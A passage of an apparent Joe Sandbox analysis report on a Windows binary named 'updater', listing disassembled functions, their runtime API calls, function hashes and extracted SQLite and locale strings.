                                    • Opcode ID: dda267a50077e33c45978a1d260a09a79bfb975c6b5354d800f691c0a20acc8e
                                    • Instruction ID: d61d0bcba2975cef03f8219580331509d2d5b4f65956c6eaaa6e7979eb2db56b
                                    • Opcode Fuzzy Hash: dda267a50077e33c45978a1d260a09a79bfb975c6b5354d800f691c0a20acc8e
                                    • Instruction Fuzzy Hash: 8A21B676904129AFCF01EF95D890DEE7BF8BF28240B5051AAF5159B131DB72EA84CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013E8615: _strlen.LIBCMT ref: 013E865A
                                      • Part of subcall function 013E86CA: _strlen.LIBCMT ref: 013E871F
                                    • _strlen.LIBCMT ref: 013E710B
                                    Strings
                                    • sqlite_, xrefs: 013E7118
                                    • UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;, xrefs: 013E7282
                                    • sqlite_sequence, xrefs: 013E7249
                                    • UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q, xrefs: 013E7238
                                    • UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q, xrefs: 013E7261
                                    • sqlite_master, xrefs: 013E722C, 013E7234
                                    • sqlite_temp_master, xrefs: 013E7221
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q$UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q$UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;$sqlite_$sqlite_master$sqlite_sequence$sqlite_temp_master
                                    • API String ID: 4218353326-1520438555
                                    • Opcode ID: 717db15a86e9adbe06971112fb94a6cdfe349e04ad5b1a08230f024b0f7f34f9
                                    • Instruction ID: c36b33f561f77178860c194a3f7eb15592f5cd0d0e2767f4827a71325fc2865d
                                    • Opcode Fuzzy Hash: 717db15a86e9adbe06971112fb94a6cdfe349e04ad5b1a08230f024b0f7f34f9
                                    • Instruction Fuzzy Hash: 0061C731F00326ABDF14ABA9DC44A6EB7F6AF94218F244069E901A73D5DB30DD41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $, $CREATE TABLE $CREATE TEMP TABLE
                                    • API String ID: 4218353326-108156782
                                    • Opcode ID: 99a79c97c3028ea6a1a31688f49b4427beb66e50cee076ee2d8df565d52506e7
                                    • Instruction ID: 50bc3e0fa0e0d045def2e743ca335a771008636dd2ae2d8dc1e03fcf09839f1f
                                    • Opcode Fuzzy Hash: 99a79c97c3028ea6a1a31688f49b4427beb66e50cee076ee2d8df565d52506e7
                                    • Instruction Fuzzy Hash: 4E512C71E00216AFDF14DFACC884A9EBBF5FF58218B15446AD409EB255E730AE05CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 01402738
                                    • _Maklocstr.LIBCPMT ref: 014027A1
                                    • _Maklocstr.LIBCPMT ref: 014027B3
                                    • _Maklocchr.LIBCPMT ref: 014027CB
                                    • _Maklocchr.LIBCPMT ref: 014027DB
                                    • _Getvals.LIBCPMT ref: 014027FD
                                      • Part of subcall function 013FB678: _Maklocchr.LIBCPMT ref: 013FB6A7
                                      • Part of subcall function 013FB678: _Maklocchr.LIBCPMT ref: 013FB6BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                    • String ID: false$true
                                    • API String ID: 3549167292-2658103896
                                    • Opcode ID: 949364c3ec99f845f8f9b8c6ace595b1fd53645fd5070b1051238e65ef258e8e
                                    • Instruction ID: 0e71468782a0580dd70523903c2ab002e6983d86983c20737e2819bc06cfce6b
                                    • Opcode Fuzzy Hash: 949364c3ec99f845f8f9b8c6ace595b1fd53645fd5070b1051238e65ef258e8e
                                    • Instruction Fuzzy Hash: 372191B2D00254ABDF15EFA9D845ECEBB68EF14610F10801FFA08AF291DBB08540CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                    • API String ID: 4218353326-51310709
                                    • Opcode ID: 1ffe729f472f5cb27d2b0c25f280b3b1918fd01e0c1a3ff00f346fae8c49c5de
                                    • Instruction ID: 09d839b948d3509631312a7bac4c3f125b008d580ce852146c396cd58adc2750
                                    • Opcode Fuzzy Hash: 1ffe729f472f5cb27d2b0c25f280b3b1918fd01e0c1a3ff00f346fae8c49c5de
                                    • Instruction Fuzzy Hash: 8D114236249F3325B655612F6C89ADB3E888DE343A3A4801FDB08B49D5FF6CA5434179
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 0e9aa8b570002df678390a20a192a485d4b51cc0809da75dc9ca1e6390feef6a
                                    • Instruction ID: ce14295e8bf5034aa066f9fd23c074257f73bdd29496f17f2c2fe8ad98171562
                                    • Opcode Fuzzy Hash: 0e9aa8b570002df678390a20a192a485d4b51cc0809da75dc9ca1e6390feef6a
                                    • Instruction Fuzzy Hash: 2861D471900336EFD721DF69C880BAB77E9EF54710F94402BE555EB261EBB09981CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MaklocchrMaklocstr$H_prolog3_
                                    • String ID: false$true
                                    • API String ID: 2404127365-2658103896
                                    • Opcode ID: 7da9dfa8c9d5974315323d6877e7a4da626f0412bbff0911c91f60c880b7a9dc
                                    • Instruction ID: 084b8613e9855165ee590a62833492e2a96b4cb636c1e0c7f069a100cb43cc5b
                                    • Opcode Fuzzy Hash: 7da9dfa8c9d5974315323d6877e7a4da626f0412bbff0911c91f60c880b7a9dc
                                    • Instruction Fuzzy Hash: 8E213DB5C00384AADF15EFAAC844D9EBBB8EF95700F10845FE9159B2A5E6709540CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 3409252457-0
                                    • Opcode ID: 7e9f3535bd859882e35b96b2546844b1baaa56361f9eca4ad0b4279fb2ef4177
                                    • Instruction ID: 9863b8262b6dd787c0b6682044683d66ef5a61e7061a1aee4297cebce6c22f3d
                                    • Opcode Fuzzy Hash: 7e9f3535bd859882e35b96b2546844b1baaa56361f9eca4ad0b4279fb2ef4177
                                    • Instruction Fuzzy Hash: 6E51D971A043276FEB21AFB99880A6EBBF4AF11320F94415FE510973B2EE7585C18B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • _free.LIBCMT ref: 0141F14E
                                    • _free.LIBCMT ref: 0141F167
                                    • _free.LIBCMT ref: 0141F1A5
                                    • _free.LIBCMT ref: 0141F1AE
                                    • _free.LIBCMT ref: 0141F1BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast
                                    • String ID: C
                                    • API String ID: 3291180501-1037565863
                                    • Opcode ID: 18e54dcbdb68f136d7ced2faec874799b8768f80ec6a68050ee4d2f4ec71bc20
                                    • Instruction ID: 26d0841f6abe3ff04a1975fbef52bcf45c23142634fbaf82f0635110720a3a8a
                                    • Opcode Fuzzy Hash: 18e54dcbdb68f136d7ced2faec874799b8768f80ec6a68050ee4d2f4ec71bc20
                                    • Instruction Fuzzy Hash: 38B16C75A0122A9FDB25DF18C894AAEB7B4FF18314F5041EEE909A7364D731AE85CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 0140D706
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0140D794
                                    • __alloca_probe_16.LIBCMT ref: 0140D7BE
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0140D806
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0140D820
                                    • __alloca_probe_16.LIBCMT ref: 0140D846
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0140D883
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16$Info
                                    • String ID:
                                    • API String ID: 2298828789-0
                                    • Opcode ID: 74c7a2a92713fc75f832136a2f465840584acee2e2a8644b43fe806119c8d4ab
                                    • Instruction ID: d19f0420bb12d72ce7655acf39f0c68e759e31b38d748d760eafe185ce34af85
                                    • Opcode Fuzzy Hash: 74c7a2a92713fc75f832136a2f465840584acee2e2a8644b43fe806119c8d4ab
                                    • Instruction Fuzzy Hash: 30719372D102569AEF229EEA8C40AEF7FB5AF15650F18043BE954A72F0D7358908CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 0140F007
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0140F00F
                                    • _ValidateLocalCookies.LIBCMT ref: 0140F098
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0140F0C3
                                    • _ValidateLocalCookies.LIBCMT ref: 0140F118
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: d01e5679290d39b007f30c0e67a3445dc576cc2a27dd4c34b3fc0cd1ec0b4c07
                                    • Instruction ID: e15f6e3a7b307de7f3b6cff2d091b79e428c88459b75510885e9d77a06210b63
                                    • Opcode Fuzzy Hash: d01e5679290d39b007f30c0e67a3445dc576cc2a27dd4c34b3fc0cd1ec0b4c07
                                    • Instruction Fuzzy Hash: 8641E774A00209EFCF21DF2AC840A9E7FB5EF54214F14817BEA14AB3B5D7319A05CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::locale::_Init.LIBCPMT ref: 013B18B7
                                      • Part of subcall function 013FA7A9: std::_Lockit::_Lockit.LIBCPMT ref: 013FA7BB
                                      • Part of subcall function 013FA7A9: std::locale::_Setgloballocale.LIBCPMT ref: 013FA7D6
                                      • Part of subcall function 013FA7A9: _Yarn.LIBCPMT ref: 013FA7EC
                                      • Part of subcall function 013FA7A9: std::_Lockit::~_Lockit.LIBCPMT ref: 013FA82C
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013B18D8
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B191C
                                    • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 013B1952
                                      • Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F8FE1
                                      • Part of subcall function 013F8FBF: ctype.LIBCPMT ref: 013F9001
                                      • Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F900D
                                      • Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F9037
                                      • Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F9065
                                      • Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F9072
                                      • Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F9099
                                      • Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F90A6
                                      • Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F90ED
                                      • Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F914D
                                    • _Yarn.LIBCPMT ref: 013B196F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$Lockit::_Yarn$InitLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocalectype
                                    • String ID: bad locale name
                                    • API String ID: 2393377010-1405518554
                                    • Opcode ID: ebd63902e3cc31a109a786cb3d6c27bb90fb4deaddd3715df4775027a7d5e98d
                                    • Instruction ID: 56618c8066e9b92fb8312133b7e9f1ee6ddbbadfe8c7c1eab9b4619320ceafb7
                                    • Opcode Fuzzy Hash: ebd63902e3cc31a109a786cb3d6c27bb90fb4deaddd3715df4775027a7d5e98d
                                    • Instruction Fuzzy Hash: 90419E71D00249EFDB04DFECE480BDEBBB4AF29318F14416DE255A3691D7705A04CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen$PathTemp
                                    • String ID: %s\etilqs_$\
                                    • API String ID: 1134129140-699725532
                                    • Opcode ID: f5c4f8807a65b488feb28f7266779200c6abedae07da91235618d04abe4af0ba
                                    • Instruction ID: bfa9bda563678636affb20e90922f0242965d3d6ebd8b1a8190f134ed10a9752
                                    • Opcode Fuzzy Hash: f5c4f8807a65b488feb28f7266779200c6abedae07da91235618d04abe4af0ba
                                    • Instruction Fuzzy Hash: 0E313EF390425A5FF720966CFC45EFB3BACBF60218F1404A9E445D6181EA70DE488762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleCP.KERNEL32 ref: 014217F9
                                    • __fassign.LIBCMT ref: 014219D8
                                    • __fassign.LIBCMT ref: 014219F5
                                    • WriteFile.KERNEL32(?,00000001,00000000,?,00000000), ref: 01421A3D
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01421A7D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01421B29
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 83ecf3b2bfe126f561635062a579951e1a25e3d8e4249a39dea71155bc466af0
                                    • Instruction ID: fa2066a2419c6cc65b544c49752956cff8f8dab304d3a2f343073b15721f8912
                                    • Opcode Fuzzy Hash: 83ecf3b2bfe126f561635062a579951e1a25e3d8e4249a39dea71155bc466af0
                                    • Instruction Fuzzy Hash: 64D19D75D002A99FCF15CFA8C8809EDFBB5FF48714F68016AE855BB351E630A986CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _ValidateScopeTableHandlers.LIBCMT ref: 01431554
                                    • __FindPESection.LIBCMT ref: 01431571
                                    • VirtualQuery.KERNEL32(83000000,4350CDAC,0000001C,4350CDAC,?,?,?), ref: 01431656
                                    • __FindPESection.LIBCMT ref: 01431693
                                    • _ValidateScopeTableHandlers.LIBCMT ref: 014316B3
                                    • __FindPESection.LIBCMT ref: 014316CD
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                    • String ID:
                                    • API String ID: 2529200597-0
                                    • Opcode ID: cfe0c55b618dcd820dbf13961ce2170fec7a304a35aa06200884639b1a1187d5
                                    • Instruction ID: 1d3a8f83a0135231f217f0b2aaa7a985dca11e94f537420e44b06f48d980e755
                                    • Opcode Fuzzy Hash: cfe0c55b618dcd820dbf13961ce2170fec7a304a35aa06200884639b1a1187d5
                                    • Instruction Fuzzy Hash: EBA1B475F002058BDB21CF9DD9806AEB7A5EB8CB50F19422BE909973B5D735EC01CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013CEAF7
                                    • int.LIBCPMT ref: 013CEB0E
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013CEB48
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013CEB5E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013CEB73
                                    • _Deallocate.LIBCONCRT ref: 013CEC3C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_Register
                                    • String ID:
                                    • API String ID: 55420841-0
                                    • Opcode ID: 5706205587b92ba6387539829d537b645e87c0b848135b9fdad3ebb925ffa180
                                    • Instruction ID: aa473005b12511eae55ca36de30ff11d4bcc00ee91422934b22b25c02eaba51b
                                    • Opcode Fuzzy Hash: 5706205587b92ba6387539829d537b645e87c0b848135b9fdad3ebb925ffa180
                                    • Instruction Fuzzy Hash: 1941C676A002069FCB24DF6CD4849AEBBF5FF54724B24462DE966D7390DB30AE40CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,014110B0,01410EE6,0140E5FE), ref: 014110C7
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014110D5
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014110EE
                                    • SetLastError.KERNEL32(00000000,014110B0,01410EE6,0140E5FE), ref: 01411140
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: b819d862eb53b228bf40ad7b1f3428042ad3692dd21d4a70e570b2d4620246fc
                                    • Instruction ID: 43deeacd564803fd30d5cb6f0a8e0b78f645acfca4854d15e1ed673c8265f71e
                                    • Opcode Fuzzy Hash: b819d862eb53b228bf40ad7b1f3428042ad3692dd21d4a70e570b2d4620246fc
                                    • Instruction Fuzzy Hash: 5B01DDB221A3135EAB25277D6C84D6B6A56EB36DB4730432FE310855FDEFB144019250
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileW.KERNEL32(00000000), ref: 013D3721
